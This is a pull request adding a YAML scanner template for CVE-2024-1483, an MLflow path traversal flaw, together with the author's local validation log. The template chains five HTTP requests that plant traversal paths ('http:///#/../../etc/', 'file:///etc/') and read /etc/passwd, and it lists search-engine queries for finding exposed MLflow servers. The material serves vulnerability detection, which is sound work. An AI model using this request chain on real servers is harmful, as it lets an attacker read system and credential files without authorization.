### PR TITLE
Create CVE-2024-1483.yaml

### DIFF
--- a/http/cves/2024/CVE-2024-1483.yaml
+++ b/http/cves/2024/CVE-2024-1483.yaml
@@ -1,0 +1,103 @@
+id: CVE-2024-1483
+
+info:
+  name: Mlflow < 2.9.2 - Path Traversal
+  author: gy741
+  severity: high
+  description: |
+    A path traversal vulnerability exists in mlflow/mlflow version 2.9.2, allowing attackers to access arbitrary files on the server. By crafting a series of HTTP POST requests with specially crafted 'artifact_location' and 'source' parameters, using a local URI with '#' instead of '?', an attacker can traverse the server's directory structure. The issue occurs due to insufficient validation of user-supplied input in the server's handlers.
+  impact: |
+    Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
+  remediation: |
+    To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
+  reference:
+    - https://huntr.com/bounties/52a3855d-93ff-4460-ac24-9c7e4334198d
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-1483
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-1483
+    cwe-id: CWE-29
+    epss-score: 0.00044
+    epss-percentile: 0.11996
+    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 5
+    vendor: lfprojects
+    product: mlflow
+    shodan-query: "http.title:\"mlflow\""
+    fofa-query:
+      - title="mlflow"
+      - app="mlflow"
+    google-query: intitle:"mlflow"
+  tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects
+
+http:
+  - raw:
+      - |
+        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{randstr}}", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}
+
+      - |
+        POST /api/2.0/mlflow/runs/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"experiment_id": "{{EXPERIMENT_ID}}"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{randstr}}"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}
+
+      - |
+        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header_5
+        words:
+          - "filename=passwd"
+          - "application/octet-stream"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body_1
+        name: EXPERIMENT_ID
+        group: 1
+        json:
+          - '.experiment_id'
+        internal: true
+
+      - type: json
+        part: body_2
+        name: RUN_ID
+        group: 1
+        json:
+          - '.run.info.run_id'
+        internal: true


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2024-1483
 
```
A path traversal vulnerability exists in mlflow/mlflow version 2.9.2, allowing attackers to access arbitrary files on the server. By crafting a series of HTTP POST requests with specially crafted 'artifact_location' and 'source' parameters, using a local URI with '#' instead of '?', an attacker can traverse the server's directory structure. The issue occurs due to insufficient validation of user-supplied input in the server's handlers.
```

- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```
POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15
Connection: close
Content-Length: 120
Content-Type: application/json
Accept-Encoding: gzip

{"name": "2pdd0RIuJ58TRPHN2flTH5ooVb0", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}
[DBG] [CVE-2024-1483] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 43
Content-Type: application/json
Date: Mon, 02 Dec 2024 00:34:22 GMT
Server: gunicorn

{
  "experiment_id": "486163297002617079"
}
[INF] [CVE-2024-1483] Dumped HTTP request for http://127.0.0.1:5000/api/2.0/mlflow/runs/create

POST /api/2.0/mlflow/runs/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.27
Connection: close
Content-Length: 39
Content-Type: application/json
Accept-Encoding: gzip

{"experiment_id": "486163297002617079"}
[DBG] [CVE-2024-1483] Dumped HTTP response http://127.0.0.1:5000/api/2.0/mlflow/runs/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 618
Content-Type: application/json
Date: Mon, 02 Dec 2024 00:34:22 GMT
Server: gunicorn

{
  "run": {
    "info": {
      "run_uuid": "48d3566e64e74c1193af44486251e600",
      "experiment_id": "486163297002617079",
      "run_name": "ambitious-stoat-269",
      "user_id": "",
      "status": "RUNNING",
      "start_time": 0,
      "artifact_uri": "http:///48d3566e64e74c1193af44486251e600/artifacts#/../../../../../../../../../../../../../../etc/",
      "lifecycle_stage": "active",
      "run_id": "48d3566e64e74c1193af44486251e600"
    },
    "data": {
      "tags": [
        {
          "key": "mlflow.runName",
          "value": "ambitious-stoat-269"
        }
      ]
    },
    "inputs": {}
  }
}
[INF] [CVE-2024-1483] Dumped HTTP request for http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create

POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.26
Connection: close
Content-Length: 39
Content-Type: application/json
Accept-Encoding: gzip

{"name": "2pdd0RIuJ58TRPHN2flTH5ooVb0"}
[DBG] [CVE-2024-1483] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 159
Content-Type: application/json
Date: Mon, 02 Dec 2024 00:34:22 GMT
Server: gunicorn

{
  "registered_model": {
    "name": "2pdd0RIuJ58TRPHN2flTH5ooVb0",
    "creation_timestamp": 1733099662310,
    "last_updated_timestamp": 1733099662310
  }
}
[INF] [CVE-2024-1483] Dumped HTTP request for http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create

POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Content-Length: 111
Content-Type: application/json
Accept-Encoding: gzip

{"name": "2pdd0RIuJ58TRPHN2flTH5ooVb0", "run_id": "48d3566e64e74c1193af44486251e600", "source": "file:///etc/"}
[DBG] [CVE-2024-1483] Dumped HTTP response http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create

HTTP/1.1 200 OK
Connection: close
Content-Length: 351
Content-Type: application/json
Date: Mon, 02 Dec 2024 00:34:22 GMT
Server: gunicorn

{
  "model_version": {
    "name": "2pdd0RIuJ58TRPHN2flTH5ooVb0",
    "version": "1",
    "creation_timestamp": 1733099662315,
    "last_updated_timestamp": 1733099662315,
    "current_stage": "None",
    "description": "",
    "source": "file:///etc/",
    "run_id": "48d3566e64e74c1193af44486251e600",
    "status": "READY",
    "run_link": ""
  }
}
[INF] [CVE-2024-1483] Dumped HTTP request for http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=2pdd0RIuJ58TRPHN2flTH5ooVb0&version=1

GET /model-versions/get-artifact?path=passwd&name=2pdd0RIuJ58TRPHN2flTH5ooVb0&version=1 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-1483] Dumped HTTP response http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=2pdd0RIuJ58TRPHN2flTH5ooVb0&version=1

HTTP/1.1 200 OK
Connection: close
Content-Length: 1711
Cache-Control: no-cache
Content-Disposition: attachment; filename=passwd
Content-Type: application/octet-stream
Date: Mon, 02 Dec 2024 00:34:22 GMT
Etag: "1733097610.24-1711-393413677"
Last-Modified: Mon, 02 Dec 2024 00:00:10 GMT
Server: gunicorn
X-Content-Type-Options: nosniff


00000000  72 6f 6f 74 3a 78 3a 30  3a 30 3a 72 6f 6f 74 3a  |root:x:0:0:root:|
...
...
...
[CVE-2024-1483:regex-1] [http] [high] http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=2pdd0RIuJ58TRPHN2flTH5ooVb0&version=1
[CVE-2024-1483:word-2] [http] [high] http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=2pdd0RIuJ58TRPHN2flTH5ooVb0&version=1
[CVE-2024-1483:status-3] [http] [high] http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=2pdd0RIuJ58TRPHN2flTH5ooVb0&version=1

```
